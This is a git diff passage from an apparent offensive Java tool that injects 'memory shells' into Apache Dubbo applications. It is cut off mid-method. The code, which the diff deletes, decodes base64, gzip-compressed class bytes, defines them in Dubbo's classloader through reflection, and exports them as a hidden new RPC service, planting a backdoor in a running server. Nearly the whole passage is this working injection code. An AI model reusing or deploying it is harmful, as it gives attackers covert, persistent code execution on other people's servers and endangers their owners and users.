ServiceConfig<?> serviceConfig = providerModel.getMetadata();
|
||||
if (serviceConfig != null && normalizedPath.equals(normalizePath(serviceConfig.getPath()))) {
|
||||
return serviceConfig;
|
||||
}
|
||||
}
|
||||
return null;
|
||||
}
|
||||
|
||||
private ProviderConfig findProviderConfig() {
|
||||
for (ProviderModel providerModel : providerModels()) {
|
||||
ServiceConfig<?> serviceConfig = providerModel.getMetadata();
|
||||
if (serviceConfig != null && serviceConfig.getProvider() != null) {
|
||||
return serviceConfig.getProvider();
|
||||
}
|
||||
}
|
||||
return null;
|
||||
}
|
||||
|
||||
private ApplicationConfig findApplicationConfig(ProviderConfig providerConfig) {
|
||||
if (providerConfig != null && providerConfig.getApplication() != null) {
|
||||
return providerConfig.getApplication();
|
||||
}
|
||||
|
||||
for (ProviderModel providerModel : providerModels()) {
|
||||
com.alibaba.dubbo.config.ServiceConfig<?> serviceConfig = providerModel.getMetadata();
|
||||
if (serviceConfig == null) {
|
||||
continue;
|
||||
}
|
||||
if (serviceConfig.getApplication() != null) {
|
||||
return serviceConfig.getApplication();
|
||||
}
|
||||
if (serviceConfig.getProvider() != null && serviceConfig.getProvider().getApplication() != null) {
|
||||
return serviceConfig.getProvider().getApplication();
|
||||
}
|
||||
}
|
||||
return null;
|
||||
}
|
||||
|
||||
private List<ProtocolConfig> findProtocolConfigs(ProviderConfig providerConfig) {
|
||||
List<ProtocolConfig> protocols = new ArrayList<ProtocolConfig>();
|
||||
addProtocols(protocols, providerConfig == null ? null : providerConfig.getProtocols());
|
||||
for (ProviderModel providerModel : providerModels()) {
|
||||
ServiceConfig<?> serviceConfig = providerModel.getMetadata();
|
||||
if (serviceConfig == null) {
|
||||
continue;
|
||||
}
|
||||
addProtocols(protocols, serviceConfig.getProtocols());
|
||||
addProtocols(protocols, serviceConfig.getProvider() == null ? null : serviceConfig.getProvider().getProtocols());
|
||||
}
|
||||
return uniqueProtocols(protocols);
|
||||
}
|
||||
|
||||
private List<RegistryConfig> findRegistryConfigs(ProviderConfig providerConfig, ApplicationConfig applicationConfig) {
|
||||
List<RegistryConfig> registries = registries(providerConfig == null ? null : providerConfig.getRegistries());
|
||||
if (!registries.isEmpty()) {
|
||||
return registries;
|
||||
}
|
||||
|
||||
registries = registries(applicationConfig == null ? null : applicationConfig.getRegistries());
|
||||
if (!registries.isEmpty()) {
|
||||
return registries;
|
||||
}
|
||||
|
||||
for (ProviderModel providerModel : providerModels()) {
|
||||
ServiceConfig<?> serviceConfig = providerModel.getMetadata();
|
||||
if (serviceConfig == null) {
|
||||
continue;
|
||||
}
|
||||
|
||||
registries = registries(serviceConfig.getRegistries());
|
||||
if (!registries.isEmpty()) {
|
||||
return registries;
|
||||
}
|
||||
|
||||
ProviderConfig serviceProvider = serviceConfig.getProvider();
|
||||
registries = registries(serviceProvider == null ? null : serviceProvider.getRegistries());
|
||||
if (!registries.isEmpty()) {
|
||||
return registries;
|
||||
}
|
||||
|
||||
ApplicationConfig serviceApplication = serviceConfig.getApplication();
|
||||
registries = registries(serviceApplication == null ? null : serviceApplication.getRegistries());
|
||||
if (!registries.isEmpty()) {
|
||||
return registries;
|
||||
}
|
||||
}
|
||||
|
||||
return new ArrayList<RegistryConfig>();
|
||||
}
|
||||
|
||||
private String resolveServiceAddresses(String servicePath) {
|
||||
String normalizedPath = normalizePath(servicePath);
|
||||
ServiceConfig<?> serviceConfig = dynamicServices.get(normalizedPath);
|
||||
if (serviceConfig == null) {
|
||||
serviceConfig = findRegisteredService(normalizedPath);
|
||||
}
|
||||
if (serviceConfig == null) {
|
||||
return normalizedPath;
|
||||
}
|
||||
|
||||
List<URL> exportedUrls = serviceConfig.getExportedUrls();
|
||||
if (exportedUrls != null && !exportedUrls.isEmpty()) {
|
||||
return formatUrls(exportedUrls);
|
||||
}
|
||||
|
||||
List<ProtocolConfig> protocols = uniqueProtocols(serviceConfig.getProtocols());
|
||||
if (protocols.isEmpty() && serviceConfig.getProvider() != null) {
|
||||
protocols = uniqueProtocols(serviceConfig.getProvider().getProtocols());
|
||||
}
|
||||
if (protocols.isEmpty()) {
|
||||
return normalizedPath;
|
||||
}
|
||||
|
||||
return formatProtocolAddresses(protocols, normalizedPath);
|
||||
}
|
||||
|
||||
private String formatUrls(List<URL> urls) {
|
||||
StringBuilder builder = new StringBuilder();
|
||||
for (URL url : urls) {
|
||||
if (builder.length() > 0) {
|
||||
builder.append(", ");
|
||||
}
|
||||
builder.append(formatUrl(url));
|
||||
}
|
||||
return builder.toString();
|
||||
}
|
||||
|
||||
private String formatProtocolAddresses(List<ProtocolConfig> protocols, String path) {
|
||||
StringBuilder builder = new StringBuilder();
|
||||
for (ProtocolConfig protocol : protocols) {
|
||||
if (builder.length() > 0) {
|
||||
builder.append(", ");
|
||||
}
|
||||
builder.append(formatProtocolAddress(protocol, path));
|
||||
}
|
||||
return builder.toString();
|
||||
}
|
||||
|
||||
private String formatUrl(URL url) {
|
||||
String path = normalizePath(url.getPath());
|
||||
int port = url.getPort();
|
||||
return port > 0
|
||||
? String.format("%s://%s:%d/%s", url.getProtocol(), DISPLAY_HOST, port, path)
|
||||
: String.format("%s://%s/%s", url.getProtocol(), DISPLAY_HOST, path);
|
||||
}
|
||||
|
||||
private String formatProtocolAddress(ProtocolConfig protocol, String path) {
|
||||
String protocolName = notEmpty(protocol.getName()) ? protocol.getName() : "dubbo";
|
||||
Integer port = protocol.getPort();
|
||||
return port != null && port > 0
|
||||
? String.format("%s://%s:%d/%s", protocolName, DISPLAY_HOST, port, path)
|
||||
: String.format("%s://%s/%s", protocolName, DISPLAY_HOST, path);
|
||||
}
|
||||
|
||||
private List<ProviderModel> providerModels() {
|
||||
try {
|
||||
return ApplicationModel.allProviderModels();
|
||||
} catch (Throwable ignored) {
|
||||
return new ArrayList<ProviderModel>();
|
||||
}
|
||||
}
|
||||
|
||||
private void addProtocols(List<ProtocolConfig> target, List<ProtocolConfig> source) {
|
||||
if (source != null) {
|
||||
target.addAll(source);
|
||||
}
|
||||
}
|
||||
|
||||
private List<ProtocolConfig> uniqueProtocols(List<ProtocolConfig> protocols) {
|
||||
Map<String, ProtocolConfig> unique = new LinkedHashMap<String, ProtocolConfig>();
|
||||
if (protocols != null) {
|
||||
for (ProtocolConfig protocol : protocols) {
|
||||
if (protocol != null) {
|
||||
unique.put(protocolKey(protocol), protocol);
|
||||
}
|
||||
}
|
||||
}
|
||||
return new ArrayList<ProtocolConfig>(unique.values());
|
||||
}
|
||||
|
||||
private List<RegistryConfig> registries(List<RegistryConfig> registries) {
|
||||
return registries == null ? new ArrayList<RegistryConfig>() : new ArrayList<RegistryConfig>(registries);
|
||||
}
|
||||
|
||||
private String protocolKey(ProtocolConfig protocol) {
|
||||
return String.valueOf(protocol.getName())
|
||||
+ "|"
|
||||
+ String.valueOf(protocol.getHost())
|
||||
+ "|"
|
||||
+ String.valueOf(protocol.getPort())
|
||||
+ "|"
|
||||
+ String.valueOf(protocol.getServer())
|
||||
+ "|"
|
||||
+ String.valueOf(protocol.getId());
|
||||
}
|
||||
|
||||
private String normalizePath(String path) {
|
||||
if (path == null) {
|
||||
return "";
|
||||
}
|
||||
|
||||
String normalized = path.trim();
|
||||
while (normalized.startsWith("/")) {
|
||||
normalized = normalized.substring(1);
|
||||
}
|
||||
return normalized;
|
||||
}
|
||||
|
||||
private boolean notEmpty(String value) {
|
||||
return value != null && !value.isEmpty();
|
||||
}
|
||||
|
||||
private String stackTrace(Throwable throwable) {
|
||||
StringWriter writer = new StringWriter();
|
||||
throwable.printStackTrace(new PrintWriter(writer));
|
||||
return writer.toString();
|
||||
}
|
||||
}
|
||||
-616
@@ -1,616 +0,0 @@
|
||||
package com.reajason.javaweb.memshell.injector.dubbo;
|
||||
|
||||
import javassist.ClassPool;
|
||||
import org.apache.dubbo.common.bytecode.ClassGenerator;
|
||||
import org.apache.dubbo.config.*;
|
||||
import org.apache.dubbo.rpc.model.ApplicationModel;
|
||||
|
||||
import java.io.*;
|
||||
import java.lang.reflect.Constructor;
|
||||
import java.lang.reflect.Field;
|
||||
import java.lang.reflect.Method;
|
||||
import java.lang.reflect.Modifier;
|
||||
import java.security.ProtectionDomain;
|
||||
import java.util.*;
|
||||
import java.util.concurrent.ConcurrentHashMap;
|
||||
import java.util.stream.Collectors;
|
||||
import java.util.zip.GZIPInputStream;
|
||||
|
||||
public class ApacheDubboServiceInjector {
|
||||
private final Map<String, ServiceConfig<?>> DYNAMIC_SERVICES = new ConcurrentHashMap<>();
|
||||
private static final String DISPLAY_HOST = "x.x.x.x";
|
||||
private static String msg = "";
|
||||
private static boolean ok = false;
|
||||
|
||||
public String getUrlPattern() {
|
||||
return "{{urlPattern}}";
|
||||
}
|
||||
|
||||
public String getClassName() {
|
||||
return "{{className}}";
|
||||
}
|
||||
|
||||
public String getBase64String() {
|
||||
return "{{base64Str}}";
|
||||
}
|
||||
|
||||
public String getHelperBase64String() {
|
||||
return "{{helperBase64String}}";
|
||||
}
|
||||
|
||||
public ApacheDubboServiceInjector() {
|
||||
if (ok) {
|
||||
return;
|
||||
}
|
||||
try {
|
||||
msg += registerService();
|
||||
} catch (Throwable e) {
|
||||
msg += "unexcepted error: " + getErrorMessage(e);
|
||||
}
|
||||
ok = true;
|
||||
System.out.println(msg);
|
||||
}
|
||||
|
||||
private Class<?> loadClass(String payload) throws Exception {
|
||||
ClassLoader classLoader = resolveDubboClassLoader();
|
||||
byte[] classBytes = gzipDecompress(decodeBase64(payload));
|
||||
definePackageIfNeeded(classLoader, getClassName());
|
||||
Class<?> loadedClass = defineClass(classLoader, classBytes);
|
||||
registerInJavassistClassPool(classLoader, loadedClass.getName(), classBytes);
|
||||
msg += "[" + classLoader.getClass().getName() + "] ";
|
||||
return loadedClass;
|
||||
}
|
||||
|
||||
private ClassLoader resolveDubboClassLoader() {
|
||||
ClassLoader classLoader = invokeDubboClassLoader("org.apache.dubbo.common.utils.ClassHelper");
|
||||
if (classLoader != null) {
|
||||
return classLoader;
|
||||
}
|
||||
classLoader = invokeDubboClassLoader("org.apache.dubbo.common.utils.ClassUtils");
|
||||
if (classLoader != null) {
|
||||
return classLoader;
|
||||
}
|
||||
classLoader = ClassGenerator.class.getClassLoader();
|
||||
return classLoader != null ? classLoader : Thread.currentThread().getContextClassLoader();
|
||||
}
|
||||
|
||||
private ClassLoader invokeDubboClassLoader(String className) {
|
||||
try {
|
||||
Class<?> helperClass = Class.forName(className);
|
||||
return (ClassLoader) helperClass.getMethod("getClassLoader", Class.class).invoke(null, ClassGenerator.class);
|
||||
} catch (Throwable ignored) {
|
||||
return null;
|
||||
}
|
||||
}
|
||||
|
||||
private Class<?> defineClass(ClassLoader classLoader, byte[] classBytes) throws Exception {
|
||||
ProtectionDomain protectionDomain = ClassGenerator.class.getProtectionDomain();
|
||||
Method defineClass = ClassLoader.class.getDeclaredMethod(
|
||||
"defineClass",
|
||||
String.class,
|
||||
byte[].class,
|
||||
int.class,
|
||||
int.class,
|
||||
ProtectionDomain.class
|
||||
);
|
||||
defineClass.setAccessible(true);
|
||||
return (Class<?>) defineClass.invoke(classLoader, null, classBytes, 0, classBytes.length, protectionDomain);
|
||||
}
|
||||
|
||||
private void definePackageIfNeeded(ClassLoader classLoader, String className) {
|
||||
int packageEnd = className.lastIndexOf('.');
|
||||
if (packageEnd < 0) {
|
||||
return;
|
||||
}
|
||||
String packageName = className.substring(0, packageEnd);
|
||||
try {
|
||||
Method getPackage = ClassLoader.class.getDeclaredMethod("getPackage", String.class);
|
||||
getPackage.setAccessible(true);
|
||||
if (getPackage.invoke(classLoader, packageName) != null) {
|
||||
return;
|
||||
}
|
||||
Method definePackage = ClassLoader.class.getDeclaredMethod(
|
||||
"definePackage",
|
||||
String.class,
|
||||
String.class,
|
||||
String.class,
|
||||
String.class,
|
||||
String.class,
|
||||
String.class,
|
||||
String.class,
|
||||
java.net.URL.class
|
||||
);
|
||||
definePackage.setAccessible(true);
|
||||
definePackage.invoke(classLoader, packageName, null, null, null, null, null, null, null);
|
||||
} catch (Exception ignored) {
|
||||
}
|
||||
}
|
||||
|
||||
public String toString() {
|
||||
return msg;
|
||||
}
|
||||
|
||||
private void registerInJavassistClassPool(ClassLoader classLoader, String className, byte[] classBytes) {
|
||||
try {
|
||||
ClassPool classPool = ClassGenerator.getClassPool(classLoader);
|
||||
try {
|
||||
classPool.getClass().getMethod("makeClassIfNew", InputStream.class).invoke(classPool, new ByteArrayInputStream(classBytes));
|
||||
} catch (NoSuchMethodException e) {
|
||||
classPool.getClass().getMethod("makeClass", InputStream.class).invoke(classPool, new ByteArrayInputStream(classBytes));
|
||||
}
|
||||
} catch (Throwable ignored) {
|
||||
}
|
||||
insertByteArrayClassPath(className, classLoader, classBytes);
|
||||
}
|
||||
|
||||
private void insertByteArrayClassPath(String className, ClassLoader classLoader, byte[] classBytes) {
|
||||
try {
|
||||
Class<?> classPoolClass = Class.forName("javassist.ClassPool");
|
||||
Class<?> classPathClass = Class.forName("javassist.ClassPath");
|
||||
Class<?> byteArrayClassPathClass = Class.forName("javassist.ByteArrayClassPath");
|
||||
insertClassPath(classPoolClass.getMethod("getDefault").invoke(null), classPoolClass, classPathClass, byteArrayClassPathClass, className, classBytes);
|
||||
insertClassPath(ClassGenerator.getClassPool(classLoader), classPoolClass, classPathClass, byteArrayClassPathClass, className, classBytes);
|
||||
} catch (Throwable ignored) {
|
||||
}
|
||||
}
|
||||
|
||||
private void insertClassPath(Object classPool, Class<?> classPoolClass, Class<?> classPathClass, Class<?> byteArrayClassPathClass, String className, byte[] classBytes) throws Exception {
|
||||
if (classPoolClass.getMethod("find", String.class).invoke(classPool, className) == null) {
|
||||
classPoolClass.getMethod("insertClassPath", classPathClass).invoke(classPool, byteArrayClassPathClass.getConstructor(String.class, byte[].class).newInstance(className, classBytes));
|
||||
}
|
||||
}
|
||||
|
||||
public static byte[] decodeBase64(String str) throws Exception {
|
||||
return Base64.getDecoder().decode(str);
|
||||
}
|
||||
|
||||
public static byte[] gzipDecompress(byte[] bArr) throws IOException {
|
||||
try (ByteArrayOutputStream byteArrayOutputStream = new ByteArrayOutputStream();
|
||||
GZIPInputStream gZIPInputStream = new GZIPInputStream(new ByteArrayInputStream(bArr))) {
|
||||
byte[] bArr2 = new byte[4096];
|
||||
int i;
|
||||
while ((i = gZIPInputStream.read(bArr2)) > 0) {
|
||||
byteArrayOutputStream.write(bArr2, 0, i);
|
||||
}
|
||||
return byteArrayOutputStream.toByteArray();
|
||||
}
|
||||
}
|
||||
|
||||
public String registerService() throws Exception {
|
||||
String strNormalizePath = normalizePath(getUrlPattern());
|
||||
if (strNormalizePath.isEmpty()) {
|
||||
throw new IllegalArgumentException("path must not be empty");
|
||||
}
|
||||
if (!DYNAMIC_SERVICES.containsKey(strNormalizePath) && !isPathRegisteredInFramework(strNormalizePath)) {
|
||||
Class<?> shell = loadClass(getHelperBase64String());
|
||||
Class<?> shell2 = loadClass(getBase64String());
|
||||
validateServiceTypes(shell, shell2);
|
||||
ServiceConfig<?> serviceConfigCreateServiceConfig = createServiceConfig(strNormalizePath, shell, instantiate(shell2));
|
||||
if (DYNAMIC_SERVICES.putIfAbsent(strNormalizePath, serviceConfigCreateServiceConfig) != null) {
|
||||
return resolveServiceAddresses(strNormalizePath);
|
||||
}
|
||||
try {
|
||||
serviceConfigCreateServiceConfig.export();
|
||||
return resolveServiceAddresses(strNormalizePath);
|
||||
} catch (RuntimeException e) {
|
||||
DYNAMIC_SERVICES.remove(strNormalizePath, serviceConfigCreateServiceConfig);
|
||||
throw e;
|
||||
}
|
||||
}
|
||||
return resolveServiceAddresses(strNormalizePath);
|
||||
}
|
||||
|
||||
private boolean isPathRegisteredInFramework(String str) {
|
||||
try {
|
||||
for (Object obj : getRegisteredServices()) {
|
||||
if (str.equals(obj.getClass().getMethod("getPath").invoke(obj))) {
|
||||
return true;
|
||||
}
|
||||
}
|
||||
return false;
|
||||
} catch (Exception e) {
|
||||
return false;
|
||||
}
|
||||
}
|
||||
|
||||
private Collection<?> getRegisteredServices() {
|
||||
try {
|
||||
Object configManager = resolveConfigManager();
|
||||
return toList(invokeNoArgs(configManager, "getServices"));
|
||||
} catch (Exception e) {
|
||||
try {
|
||||
Object objInvoke = ApplicationModel.class.getMethod("defaultModel").invoke(null);
|
||||
Object objInvoke2 = objInvoke.getClass().getMethod("getDefaultModule").invoke(objInvoke);
|
||||
Object objInvoke3 = objInvoke2.getClass().getMethod("getConfigManager").invoke(objInvoke2);
|
||||
return toList(invokeNoArgs(objInvoke3, "getServices"));
|
||||
} catch (Exception e2) {
|
||||
return new ArrayList<>();
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
private String normalizePath(String str) {
|
||||
if (str == null) {
|
||||
return "";
|
||||
}
|
||||
String strTrim = str.trim();
|
||||
while (true) {
|
||||
String str2 = strTrim;
|
||||
if (!str2.startsWith("/")) {
|
||||
return str2;
|
||||
}
|
||||
strTrim = str2.substring(1);
|
||||
}
|
||||
}
|
||||
|
||||
private void validateServiceTypes(Class<?> cls, Class<?> cls2) {
|
||||
if (!cls.isInterface()) {
|
||||
throw new IllegalArgumentException("not an interface: " + cls.getName());
|
||||
}
|
||||
if (cls2.isInterface() || Modifier.isAbstract(cls2.getModifiers())) {
|
||||
throw new IllegalArgumentException("implementation class is not instantiable: " + cls2.getName());
|
||||
}
|
||||
if (!cls.isAssignableFrom(cls2)) {
|
||||
throw new IllegalArgumentException(cls2.getName() + " does not implement " + cls.getName());
|
||||
}
|
||||
}
|
||||
|
||||
private Object instantiate(Class<?> cls) {
|
||||
try {
|
||||
Constructor<?> declaredConstructor = cls.getDeclaredConstructor();
|
||||
declaredConstructor.setAccessible(true);
|
||||
return declaredConstructor.newInstance();
|
||||
} catch (Exception e) {
|
||||
throw new IllegalArgumentException("failed to instantiate " + cls.getName(), e);
|
||||
}
|
||||
}
|
||||
|
||||
private ServiceConfig<Object> createServiceConfig(String str, Class<?> cls, Object obj) {
|
||||
Object configManager = resolveConfigManager();
|
||||
ProviderConfig providerConfigResolveDefaultProvider = resolveDefaultProvider(configManager);
|
||||
ProviderConfig providerConfigSanitizeProviderConfig = sanitizeProviderConfig(providerConfigResolveDefaultProvider);
|
||||
ServiceConfig<Object> serviceConfig = new ServiceConfig<>();
|
||||
serviceConfig.setInterface(cls);
|
||||
serviceConfig.setRef(obj);
|
||||
serviceConfig.setPath(str);
|
||||
serviceConfig.setProxy("jdk");
|
||||
if (providerConfigSanitizeProviderConfig != null) {
|
||||
serviceConfig.setProvider(providerConfigSanitizeProviderConfig);
|
||||
}
|
||||
ApplicationConfig applicationConfig = castApplicationConfig(extractOptionalValue(invokeNoArgs(configManager, "getApplication")));
|
||||
if (applicationConfig != null) {
|
||||
serviceConfig.setApplication(applicationConfig);
|
||||
}
|
||||
String strResolveConfiguredVersion = resolveConfiguredVersion(providerConfigResolveDefaultProvider);
|
||||
if (strResolveConfiguredVersion != null) {
|
||||
serviceConfig.setVersion(strResolveConfiguredVersion);
|
||||
}
|
||||
serviceConfig.setProtocols(resolveConfiguredProtocols(providerConfigResolveDefaultProvider, configManager));
|
||||
serviceConfig.setRegistries(resolveRegistriesForExport(castRegistries(toList(invokeNoArgs(configManager, "getDefaultRegistries"))), castRegistries(toList(invokeNoArgs(configManager, "getRegistries")))));
|
||||
return serviceConfig;
|
||||
}
|
||||
|
||||
private ProviderConfig resolveDefaultProvider(Object obj) {
|
||||
ProviderConfig providerConfigCastProviderConfig = castProviderConfig(extractOptionalValue(invokeNoArgs(obj, "getDefaultProvider")));
|
||||
if (providerConfigCastProviderConfig != null) {
|
||||
return providerConfigCastProviderConfig;
|
||||
}
|
||||
Object objInvokeNoArgs = invokeNoArgs(obj, "getDefaultModule");
|
||||
if (objInvokeNoArgs == null) {
|
||||
objInvokeNoArgs = invokeNoArgs(invokeStaticNoArgs(ApplicationModel.class, "defaultModel"), "getDefaultModule");
|
||||
}
|
||||
Object objInvokeNoArgs2 = invokeNoArgs(objInvokeNoArgs, "getConfigManager");
|
||||
ProviderConfig providerConfigCastProviderConfig2 = castProviderConfig(extractOptionalValue(invokeNoArgs(objInvokeNoArgs2, "getDefaultProvider")));
|
||||
return providerConfigCastProviderConfig2 != null ? providerConfigCastProviderConfig2 : castProviderConfig(firstElement(toList(invokeNoArgs(objInvokeNoArgs2, "getProviders"))));
|
||||
}
|
||||
|
||||
private ProviderConfig sanitizeProviderConfig(ProviderConfig providerConfig) {
|
||||
if (providerConfig == null) {
|
||||
return null;
|
||||
}
|
||||
List registries = providerConfig.getRegistries();
|
||||
if (registries == null || filterValidRegistries(registries).size() == registries.size()) {
|
||||
return providerConfig;
|
||||
}
|
||||
return null;
|
||||
}
|
||||
|
||||
private List<RegistryConfig> filterValidRegistries(Collection<RegistryConfig> collection) {
|
||||
if (collection == null) {
|
||||
return new ArrayList<>();
|
||||
}
|
||||
return collection.stream()
|
||||
.filter(registryConfig -> registryConfig != null && registryConfig.isValid())
|
||||
.collect(Collectors.toList());
|
||||
}
|
||||
|
||||
private List<RegistryConfig> resolveRegistriesForExport(Collection<RegistryConfig> collection, Collection<RegistryConfig> collection2) {
|
||||
List<RegistryConfig> listFilterValidRegistries = filterValidRegistries(collection);
|
||||
if (!listFilterValidRegistries.isEmpty()) {
|
||||
return listFilterValidRegistries;
|
||||
}
|
||||
List<RegistryConfig> listFilterValidRegistries2 = filterValidRegistries(collection2);
|
||||
return !listFilterValidRegistries2.isEmpty() ? listFilterValidRegistries2 : Collections.singletonList(new RegistryConfig("N/A"));
|
||||
}
|
||||
|
||||
private String resolveConfiguredVersion(Object obj) {
|
||||
return stringValue(invokeNoArgs(obj, "getVersion"), null);
|
||||
}
|
||||
|
||||
private List<ProtocolConfig> resolveConfiguredProtocols(ProviderConfig providerConfig, Object configManager) {
|
||||
return resolveConfiguredProtocols(providerConfig, configManager, getRegisteredServices());
|
||||
}
|
||||
|
||||
private List<ProtocolConfig> resolveConfiguredProtocols(ProviderConfig providerConfig, Object configManager, Collection<?> collection) {
|
||||
return mergeProtocols(mergeProtocols(mergeProtocols(providerConfig == null ? null : providerConfig.getProtocols(), castProtocols(toList(invokeNoArgs(configManager, "getDefaultProtocols")))), castProtocols(toList(invokeNoArgs(configManager, "getProtocols")))), collectProtocolsFromServices(collection));
|
||||
}
|
||||
|
||||
private List<ProtocolConfig> collectProtocolsFromServices(Collection<?> collection) {
|
||||
List<ProtocolConfig> arrayList = new ArrayList<>();
|
||||
if (collection != null) {
|
||||
try {
|
||||
for (Object service : collection) {
|
||||
try {
|
||||
arrayList.addAll(castProtocols(toList(invokeNoArgs(service, "getProtocols"))));
|
||||
} catch (Exception e) {
|
||||
}
|
||||
}
|
||||
} catch (Exception e2) {
|
||||
}
|
||||
}
|
||||
try {
|
||||
for (Object exportedProvider : getExportedProviders()) {
|
||||
try {
|
||||
Object objInvokeNoArgs = invokeNoArgs(exportedProvider, "getServiceConfig");
|
||||
if (objInvokeNoArgs != null) {
|
||||
arrayList.addAll(castProtocols(toList(invokeNoArgs(objInvokeNoArgs, "getProtocols"))));
|
||||
}
|
||||
} catch (Exception e3) {
|
||||
}
|
||||
}
|
||||
} catch (Exception e4) {
|
||||
}
|
||||
return arrayList;
|
||||
}
|
||||
|
||||
private Collection<?> getExportedProviders() {
|
||||
try {
|
||||
Object objInvoke = ApplicationModel.class.getMethod("getServiceRepository").invoke(null);
|
||||
return (Collection) objInvoke.getClass().getMethod("getExportedServices").invoke(objInvoke);
|
||||
} catch (Exception e) {
|
||||
try {
|
||||
Object objInvoke2 = ApplicationModel.class.getMethod("defaultModel").invoke(null);
|
||||
Object objInvoke3 = objInvoke2.getClass().getMethod("getDefaultModule").invoke(objInvoke2);
|
||||
Object objInvoke4 = objInvoke3.getClass().getMethod("getServiceRepository").invoke(objInvoke3);
|
||||
return (Collection) objInvoke4.getClass().getMethod("getExportedServices").invoke(objInvoke4);
|
||||
} catch (Exception e2) {
|
||||
return new ArrayList<>();
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
private String resolveServiceAddresses(String str) {
|
||||
String strNormalizePath = normalizePath(str);
|
||||
Object objFindRegisteredService = DYNAMIC_SERVICES.get(strNormalizePath);
|
||||
if (objFindRegisteredService == null) {
|
||||
objFindRegisteredService = findRegisteredService(strNormalizePath);
|
||||
}
|
||||
if (objFindRegisteredService == null) {
|
||||
return strNormalizePath;
|
||||
}
|
||||
List<?> listExtractExportedUrls = extractExportedUrls(objFindRegisteredService);
|
||||
if (!listExtractExportedUrls.isEmpty()) {
|
||||
return formatUrls(listExtractExportedUrls);
|
||||
}
|
||||
List<?> listResolveProtocols = resolveProtocols(objFindRegisteredService);
|
||||
if (listResolveProtocols.isEmpty()) {
|
||||
return strNormalizePath;
|
||||
}
|
||||
return formatProtocolAddresses(listResolveProtocols, strNormalizePath);
|
||||
}
|
||||
|
||||
private Object findRegisteredService(String str) {
|
||||
for (Object obj : getRegisteredServices()) {
|
||||
if (str.equals(normalizePath(stringValue(invokeNoArgs(obj, "getPath"), "")))) {
|
||||
return obj;
|
||||
}
|
||||
}
|
||||
return null;
|
||||
}
|
||||
|
||||
private List<?> extractExportedUrls(Object obj) {
|
||||
List<?> list = toList(invokeNoArgs(obj, "getExportedUrls"));
|
||||
if (!list.isEmpty()) {
|
||||
return list;
|
||||
}
|
||||
List<?> list2 = toList(getFieldValue(obj, "exporters"));
|
||||
if (list2.isEmpty()) {
|
||||
return new ArrayList<>();
|
||||
}
|
||||
List<Object> arrayList = new ArrayList<>();
|
||||
for (Object exporter : list2) {
|
||||
Object objInvokeNoArgs = invokeNoArgs(invokeNoArgs(exporter, "getInvoker"), "getUrl");
|
||||
if (objInvokeNoArgs != null) {
|
||||
arrayList.add(objInvokeNoArgs);
|
||||
}
|
||||
}
|
||||
return arrayList;
|
||||
}
|
||||
|
||||
private List<?> resolveProtocols(Object obj) {
|
||||
List<?> list = toList(invokeNoArgs(obj, "getProtocols"));
|
||||
Object objInvokeNoArgs = invokeNoArgs(obj, "getProvider");
|
||||
List<ProtocolConfig> listResolveConfiguredProtocols = resolveConfiguredProtocols(objInvokeNoArgs instanceof ProviderConfig ? (ProviderConfig) objInvokeNoArgs : null, resolveConfigManager());
|
||||
return list.isEmpty() ? listResolveConfiguredProtocols : mergeProtocols(castProtocols(list), listResolveConfiguredProtocols);
|
||||
}
|
||||
|
||||
private Object invokeNoArgs(Object obj, String str) {
|
||||
if (obj == null) {
|
||||
return null;
|
||||
}
|
||||
try {
|
||||
return obj.getClass().getMethod(str).invoke(obj);
|
||||
} catch (Exception e) {
|
||||
return null;
|
||||
}
|
||||
}
|
||||
|
||||
private Object invokeStaticNoArgs(Class<?> cls, String str) {
|
||||
try {
|
||||
return cls.getMethod(str).invoke(null);
|
||||
} catch (Exception e) {
|
||||
return null;
|
||||
}
|
||||
}
|
||||
|
||||
private Object getFieldValue(Object obj, String str) {
|
||||
if (obj == null) {
|
||||
return null;
|
||||
}
|
||||
Class<?> superclass = obj.getClass();
|
||||
while (true) {
|
||||
Class<?> cls = superclass;
|
||||
if (cls == null) {
|
||||
return null;
|
||||
}
|
||||
try {
|
||||
Field declaredField = cls.getDeclaredField(str);
|
||||
declaredField.setAccessible(true);
|
||||
return declaredField.get(obj);
|
||||
} catch (Exception e) {
|
||||
superclass = cls.getSuperclass();
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
private List<?> toList(Object obj) {
|
||||
Object value = extractOptionalValue(obj);
|
||||
if (value instanceof Collection) {
|
||||
return new ArrayList<>((Collection<?>) value);
|
||||
}
|
||||
if (value instanceof Map) {
|
||||
return new ArrayList<>(((Map<?, ?>) value).values());
|
||||
}
|
||||
return new ArrayList<>();
|
||||
}
|
||||
|
||||
private Object extractOptionalValue(Object obj) {
|
||||
if (obj instanceof Optional) {
|
||||
return ((Optional<?>) obj).orElse(null);
|
||||
}
|
||||
return obj;
|
||||
}
|
||||
|
||||
private Object firstElement(List<?> list) {
|
||||
if (list.isEmpty()) {
|
||||
return null;
|
||||
}
|
||||
return list.get(0);
|
||||
}
|
||||
|
||||
private ProviderConfig castProviderConfig(Object obj) {
|
||||
if (obj instanceof ProviderConfig) {
|
||||
return (ProviderConfig) obj;
|
||||
}
|
||||
return null;
|
||||
}
|
||||
|
||||
private ApplicationConfig castApplicationConfig(Object obj) {
|
||||
if (obj instanceof ApplicationConfig) {
|
||||
return (ApplicationConfig) obj;
|
||||
}
|
||||
return null;
|
||||
}
|
||||
|
||||
private List<RegistryConfig> castRegistries(List<?> list) {
|
||||
return list.stream()
|
||||
.filter(RegistryConfig.class::isInstance)
|
||||
.map(RegistryConfig.class::cast)
|
||||
.collect(Collectors.toList());
|
||||
}
|
||||
|
||||
private Object resolveConfigManager() {
|
||||
Object objInvokeStaticNoArgs = invokeStaticNoArgs(ApplicationModel.class, "getConfigManager");
|
||||
if (objInvokeStaticNoArgs != null) {
|
||||
return objInvokeStaticNoArgs;
|
||||
}
|
||||
Object objInvokeStaticNoArgs2 = invokeStaticNoArgs(ApplicationModel.class, "defaultModel");
|
||||
Object objInvokeNoArgs = invokeNoArgs(objInvokeStaticNoArgs2, "getDefaultModule");
|
||||
return invokeNoArgs(objInvokeNoArgs, "getConfigManager");
|
||||
}
|
||||
|
||||
private String formatUrls(List<?> list) {
|
||||
return list.stream()
|
||||
.map(this::formatUrl)
|
||||
.collect(Collectors.joining(", "));
|
||||
}
|
||||
|
||||
private String formatProtocolAddresses(List<?> list, String str) {
|
||||
return list.stream()
|
||||
.map(obj -> formatProtocolAddress(obj, str))
|
||||
.collect(Collectors.joining(", "));
|
||||
}
|
||||
|
||||
private String formatUrl(Object obj) {
|
||||
